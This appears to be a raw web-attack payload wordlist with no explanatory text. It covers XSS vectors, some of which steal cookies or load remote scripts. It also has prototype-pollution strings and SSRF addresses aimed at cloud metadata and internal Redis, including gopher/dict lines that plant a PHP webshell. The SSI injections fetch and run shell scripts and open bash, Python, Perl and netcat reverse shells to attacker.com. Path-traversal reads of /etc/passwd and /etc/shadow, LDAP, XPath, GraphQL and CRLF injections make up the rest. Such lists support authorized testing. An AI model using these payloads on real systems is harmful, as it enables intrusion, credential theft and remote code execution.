'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1>
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1>
><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1>
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1>
<iframe/%00/ src=javaSCRIPT&colon;alert(1)
<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
<iframe/onreadystatechange=alert(1)
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"></iframe><script>alert(123)</script>
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
<IFRAME SRC=”http://hacker-site.com/xss.html”>
<iframe src=http://ha.ckers.org/scriptlet.html <
<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
<iframe src=https://evil.com>
<iframe src=http://xss.rocks/scriptlet.html <
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
<iframe src=javascript:alert(1)>
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
"<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>"
<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<iframe// src=javaSCRIPT&colon;alert(1)
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<iframe src="javascript:document.vulnerable=true; <
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<iframe/src \/\/onload = prompt(1)
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<iframe src=%(scriptlet)s <
<iframe  src="&Tab;javascript:prompt(1)&Tab;">
<iframe src="vbscript:document.vulnerable=true;">
"<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">"
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<input value=<><iframe/src=javascript:confirm(1)
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
&lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</scrip>
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
var myDog = new Dog();
myDog.constructor;
myDog.constructor.prototype;
myDog.__proto__;
myDog["__proto__"];
{ "__proto__":{"ignoreQueryPrefix":true}} + ??foo=bar
{ "__proto__":{"allowDots":true}} + ?foo.bar=baz
{ "__proto__":{"json spaces":" "}} + {"foo":"bar"}
{ "__proto__":{"exposedHeaders":["foo"]}}
{ "__proto__":{"status":510}}
#a=b&__proto__[admin]=1
#__proto__[xxx]=alert(1)
?__proto__.preventDefault.__proto__.handleObj.__proto__.delegateTarget=%3Cimg/src/onerror=alert(1)%3E
?__proto__[src]=image&__proto__[onerror]=alert(1)
?a[constructor][prototype]=image&a[constructor][prototype][onerror]=alert(1)
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Object.__proto__["evilProperty"]="evilPayload"
Object.__proto__.evilProperty="evilPayload"
Object.constructor.prototype.evilProperty="evilPayload"
Object.constructor["prototype"]["evilProperty"]="evilPayload"
{"__proto__": {"evilProperty": "evilPayload"}}
{"__proto__.name":"test"}
x[__proto__][abaeead] = abaeead
x.__proto__.edcbcab = edcbcab
__proto__[eedffcb] = eedffcb
__proto__.baaebfc = baaebfc
?__proto__[test]=test
00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.
&#00;</form><input type&#61;"date" onfocus="alert(1)">
%09Jav%09ascript:alert(1)
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
%0d%0a%0d%0a%3Cscript%3Ealert(document.domain)%3C/script%3
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
-->""/>0xr3dhunt</script><img/src=@&#32;&#13; onerror = prompt(&#x64;&#x6f;&#x63;&#x75;&#x6d;&#x65;&#x6e;&#x74;&#x2e;&#x63;&#x6f;&#x6f;&#x6b;&#x69;&#x65;)>
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
¼script¾alert(¢XSS¢)¼/script¾
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
1'"><img/src/onerror=.1|alert``>
1script3document.vulnerable=true;1/script3
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
'%22()%26%25<><ScRiPt%20>alert(1)</ScRiPt>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
%22%3e%3cscript%3ealert('XSS')%3c/script%3e
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
%22;alert%28%27RVRSH3LL_XSS%29//
%25253c%25252fscript%25253e%25253cscript%25253ealert%252528document.cookie%252529%25253c%25252fscript%25253e
%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e
%253cscript%253ealert(1)%253c/script%253e
%253cscript%253ealert(document.cookie)%253c/script%253e
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
'"()%26%25<><ScRiPt >alert(document.domain)</ScRiPt>
%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+330011223344;phone-context=<script>alert(0)</script>
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
\&#34;+confirm(1)+&#34;
&#39;&#88;&#83;&#83;&#39;&#41;>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
%3cscript%3ealert('XSS')%3c/script%3e
127。0。0。1
C:\inetpub\wwwroot\iisstart.png
dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php
dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html
dict://127.0.0.1:6379/info
dict://127.0.0.1:6379/SAVE
dict://127.0.0.1:6379/SET%20mykey%20"<\x3Fphp system($_GET[0])\x3F>"
dict://localhost:11211/stat
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
file:///C:/inetpub/wwwroot/iisstart.png
file:///c:/./windows/./win.ini
file:///etc/group
file:///etc/hosts
file:///etc/network/interfaces
file:///etc/os-release
file:////./etc/./passwd
file:///etc/passwd
file://\/\/etc/passwd
file:///etc/resolv.conf
file:///etc/sysconfig/network
file:///proc/version
file:///var/www/html/.htaccess
gopher://127.0.0.1:53/_%2500%251d%25a9%25c1...
gopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php
gopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml
gopher://127.0.0.1:6379/_save
gopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec...
gopher://127.0.0.1:9000/_%01%01%00%01%00...
gopher://[host]:[port]/[type][selector]
gopher://localhost:25/_MAIL%20FROM:<attacker@example.com>%0D%0A
http://[::]
http://0/
http://0.0.0.0/
http://[0:0:0:0:0:ffff:127.0.0.1]
http://[0:0:0:0:0:ffff:127.0.0.1]/
http://[0:0:0:0:0:ffff:127.0.0.1]:22/
http://0000::1:22
http://0000::1:25
http://0000::1:3128
http://[0000::1]:80/
http://0000::1:80
http://0000::1:80/
http://0.0.0.0:22
http://0.0.0.0:22/
http://0.0.0.0:443/
http://0.0.0.0:80
http://000330.0000072.0000326.00000343
http://017700000001
http://017700000001/
http://017700000001:22/
http://0177.00.00.01
http://0177.0.0.1/
http://0177.0.0.1:22/
http://0:22/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
http://0330.072.0326.0343
http://033016553343
http://0o177.0.0.1/
http://0x7f000001/
http://⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ｡⓪ⓧⓐ⑨｡⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://0xd8.0x3a.0xd6.0xe3
http://0xd8.0x3a.0xd6e3
http://0xd8.0x3ad6e3
http://0xd83ad6e3
http://100.100.100.200/latest/meta-data/
http://127.0.0.0
http://127.0.0.0/
http://127.0.0.0:22/
http://127.0.0.1/
http://127.0.0.1:22
http://127.0.0.1:22/
http://127.0.0.1/%2561dmin
http://127.0.0.1:3306
http://127.0.0.1:443
http://127.0.0.1:443/
http://127.0.0.1/%61dmin
http://127.0.0.1/%69ndex.html
http://127.0.0.1/%69ndex.php
http://127.0.0.1:80
http://127.0.0.1/index
http://127.0.0.1/index.html
http://127.0.1
http://127.0.1/
http://127.0.1.3
http://127.0.1.3/
http://127.0.1.3:22/
http://127.1
http://127.1/
http://①②⑦.①/
http://127.1.1.1:80#\@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1:22/
http://①②⑦.①:22/
http://127.1/%2561dmin
http://127.127.127.127
http://127.127.127.127/
http://127.127.127.127:22/
http://⑯⑨。②⑤④。⑯⑨｡②⑤④/
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/metadata/v1
http://169.254.169.254/metadata/v1/hostname
http://2130706433
http://2130706433/
http://2130706433:22/
http://216.0x3a.00000000326.0xe3
http://[::]:22
http://[::]:25
http://2852039166/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://[::]:3128
http://%32%31%36%2e%35%38%2e%32%31%34%2e%32%32%37
http://3232235521/
http://3232235777/
http://3627734755
http://④②⑤｡⑤①⓪｡④②⑤｡⑤①⓪:80/ 
http://[::]:80
http://[::]:80/
http://brutelogic.com.br/poc.svg
http://customer2-app-127-0-0-1.nip.io/
http://customer3-app-7f000101.nip.io/
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
http://example.com@127.0.0.1/
http://[::ffff:127.0.0.1]
http://localhost/
http://localhost:22
http://localhost:22/
http://localhost:443/
http://localhost:80
http://localhost/server-status
http://metadata.tencentyun.com/latest/meta-data/
http://o177.0.0.1/
http://q177.0.0.1/
https://0/
https://0.0.0.0/
https://[0:0:0:0:0:ffff:127.0.0.1]/
https://0.0.0.0:443
https://017700000001/
https://0177.0.0.1/
https://127.0.0.0/
https://127.0.0.1
https://127.0.0.1/
https://127.0.0.1:443
https://127.0.0.1/%69ndex.html
https://127.0.0.1/%69ndex.php
https://127.0.1/
https://127.0.1.3/
https://127.1/
https://①②⑦.①/
https://127.127.127.127/
https://2130706433/
https://307.r3dir.me/--to/?url=http://localhost
https://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me
http://scanme.nmap.org:22
https://example.com@127.0.0.1/
https://localhost
https://localhost/
https://localhost:443
http://whitelisted@127.0.0.1
jar:ftp://127.0.0.1!/
jar:http://127.0.0.1!/
jar:https://127.0.0.1!/
jar:scheme://domain/path!/
ldap://localhost:11211/%0astats%0aquit
localhost:00011211aaaa
localhost:+11211aaa
netdoc:///etc/passwd
sftp://evil.com:11111/
ssrf.php?url=dict://attacker:11111/
tftp://evil.com:12346/TESTUDPPACKET
<!--#echo var="DATE_LOCAL" -->
<!--#flastmod file="index.html" -->
<!--#include virtual="/cgi-bin/counter.pl" -->
<!--#include virtual="/footer.html" -->
<!--#exec cmd="ls" -->
<!--#set var="name" value="Rich" -->
<!--#include virtual="file_to_include.html" -->
<!--#include file="file_to_include.html" -->
<!--#printenv -->
<!--#echo var="DOCUMENT_NAME"-->
<!--#echo var="HTTP_USER_AGENT"-->
<!--#echo var="QUERY_STRING"-->
<!--#echo var="DATE_LOCAL"-->
<!--#echo var="DATE_GMT"-->
<!--#echo var="DOCUMENT_URI"-->
<!--#echo var="LAST_MODIFIED"-->
<!--#include file="/etc/passwd"-->
<!--#include file="../etc/passwd"-->
<!--#include virtual="/etc/passwd"-->
<!--#include virtual="/proc/self/environ"-->
<!--#include virtual="../etc/shadow"-->
<!--#exec cmd="id"-->
<!--#exec cmd="whoami"-->
<!--#exec cmd="uname -a"-->
<!--#exec cmd="ls -la /"-->
<!--#exec cmd="cat /etc/passwd"-->
<!--#exec cmd="cat /proc/version"-->
<!--#exec cmd="curl http://attacker.com"-->
<!--#exec cmd="wget http://attacker.com/shell.sh -O /tmp/shell.sh && bash /tmp/shell.sh"-->
<!--#exec cmd="ping -c 1 attacker.com"-->
<!--#exec cmd="nslookup attacker.com"-->
<!--#exec cmd="dig attacker.com"-->
<!--#exec cmd="curl http://attacker.com/$(whoami)"-->
<%@ include file="/etc/passwd" %>
<%#exec cmd="id"%>
<!--#exec%20cmd="id"-->
<!--#echo%20var="DOCUMENT_NAME"-->
<!--#include%20file="/etc/passwd"-->
<!--#include%09file="/etc/passwd"-->
<!--#exec cmd="bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"-->
<!--#exec cmd="/bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'"-->
<!--#exec cmd="python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"attacker.com\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\"]);'"-->
<!--#exec cmd="nc attacker.com 4444 -e /bin/sh"-->
<!--#exec cmd="perl -e 'use Socket;$i=\"attacker.com\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">\&S\");open(STDOUT,\">\&S\");open(STDERR,\">\&S\");exec(\"/bin/sh -i\");};'"-->
'
''
///\;@google.com
///google.com
///google.com/
///google.com//
//;@google.com
//google.com
//google.com/
//google.com//
/\/google.com/
<>//google.com
@google.com
\/\/google.com/
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd{{
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../etc/passwd?
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/..\../..\../..\../..\../..\../..\../etc/passwd
/./././././././././././etc/passwd
/etc/passwd
/etc/passwd?
\..\..\..\..\..\..\..\..\..\..\etc\passwd
etc/passwd
....//....//....//....//....//....//....//etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
\21
\26
\28
\29
&
(
)
*
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
(*)*)
*)*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
<h1>rahul</h1>
<h1>rahul</h1>
<b>rahul</b>
<p>rahul</p>
=> Further:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md
--------------

{__schema{types{name}}}
{__schema{types{name}}}
{__schema}
{}
{thisdefinitelydoesnotexist}
fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}}
{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
{"query":"\n    query IntrospectionQuery {\r\n      __schema {\r\n        queryType { name }\r\n        mutationType { name }\r\n        subscriptionType { name }\r\n        types {\r\n          ...FullType\r\n        }\r\n        directives {\r\n          name\r\n          description\r\n          locations\r\n          args {\r\n            ...InputValue\r\n          }\r\n        }\r\n      }\r\n    }\r\n\r\n    fragment FullType on __Type {\r\n      kind\r\n      name\r\n      description\r\n      fields(includeDeprecated: true) {\r\n        name\r\n        description\r\n        args {\r\n          ...InputValue\r\n        }\r\n        type {\r\n          ...TypeRef\r\n        }\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      inputFields {\r\n        ...InputValue\r\n      }\r\n      interfaces {\r\n        ...TypeRef\r\n      }\r\n      enumValues(includeDeprecated: true) {\r\n        name\r\n        description\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      possibleTypes {\r\n        ...TypeRef\r\n      }\r\n    }\r\n\r\n    fragment InputValue on __InputValue {\r\n      name\r\n      description\r\n      type { ...TypeRef }\r\n      defaultValue\r\n    }\r\n\r\n    fragment TypeRef on __Type {\r\n      kind\r\n      name\r\n      ofType {\r\n        kind\r\n        name\r\n        ofType {\r\n          kind\r\n          name\r\n          ofType {\r\n            kind\r\n            name\r\n            ofType {\r\n              kind\r\n              name\r\n              ofType {\r\n                kind\r\n                name\r\n                ofType {\r\n                  kind\r\n                  name\r\n                  ofType {\r\n                    kind\r\n                    name\r\n                  }\r\n                }\r\n              }\r\n            }\r\n          }\r\n        }\r\n      }\r\n    }\r\n  ","variables":null}
%%0A0AHeader-rahul:rahul
/%%0a0aSet-Cookie:crlf=rahul
/%%0a0aSet-Cookie:crlf=rahul
%0A%20Header-rahul:rahul
/%0A%20Set-Cookie:whoami=rahul
%0AHeader-rahul:rahul
/%0Aset-cookie:%20hello=how;%0Aevil=evil;
/%0Aset-cookie:%20hello=rahul;%0Aevil=rahul;
/%0aSet-Cookie:crlf=rahul
/%0aSet-Cookie:crlf=rahul
/%0aSet-Cookie:rahul=hi;
%0D%0A%09Header-rahul:rahul
/%0D%0A%0D%0ASet-Cookie:crlfinjection=rahul
%0D%0A%20Header-rahul:rahul
/%0D%0A%20Set-Cookie:whoami=rahul
%0D%0AHeader-rahul:rahul
%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20rahul=hi%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aSet-Cookie:%20rahul=hi%0d%0a%0d%0a
/%0d%0aSet-Cookie:crlf=rahul
/%0D%0ASet-Cookie:crlfinjection=rahul
/%0d%0aSet-Cookie:crlf=rahul
/%0d%0aSet-Cookie:rahul=hi;
%0D%20Header-rahul:rahul
%0DHeader-rahul:rahul
/%0dSet-Cookie:crlf=rahul
/%0dSet-Cookie:crlf=rahul
/%0dSet-Cookie:rahul=hi;
%20%0AHeader-rahul:rahul
%20%0D%0AHeader-rahul:rahul
/%20%0D%0ASet-Cookie:whoami=rahul
%20%0DHeader-rahul:rahul
%23%0AHeader-rahul:rahul
